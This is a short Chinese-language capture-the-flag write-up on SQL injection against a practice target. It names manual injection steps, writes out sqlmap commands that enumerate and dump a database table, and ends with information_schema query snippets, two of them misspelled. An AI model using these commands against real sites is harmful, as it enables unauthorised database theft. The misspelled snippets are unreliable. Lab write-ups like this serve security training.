打開靶機,根據提示是SQL注入
打開后看到登錄窗口
方法一、手工注入
抓取數據包
開始SQL注入測試
利用萬能密碼,登錄成功
查看回顯位置
查詢數據庫
查詢數據庫內數據表
如果想整齊一點顯示可以添加group_concat()
查詢字段
查詢字段內容
成功拿到flag
方法二、sqlmap注入
把之前抓取的數據復制到sqlmap根目錄下test.txt內
保存完成后開始跑數據庫名
python2 sqlmap.py -r test.txt --dbs
跑數據庫內數據表
python2 sqlmap.py -r test.txt -D web2 --tables
查看字段
python2 sqlmap.py -r test.txt -D web2 -T flag --columns
查詢字段內容
python2 sqlmap.py -r test.txt -D web2 -T flag -C flag --dump
成功拿到flag
sql手工注入常用語句:
普通語句:schema_name——數據庫名;table_name——表名;column_name——字段名;
查詢數據庫:select schema_name from information_schema.schemata#
slelect database()#
查詢數據庫表:select table_name from information_schema.tables where table_schema='數據庫名'#
查詢字段名:select column_name from infromation_schema.columns where table_name='表名'#
查詢字段內容:select * from 表名#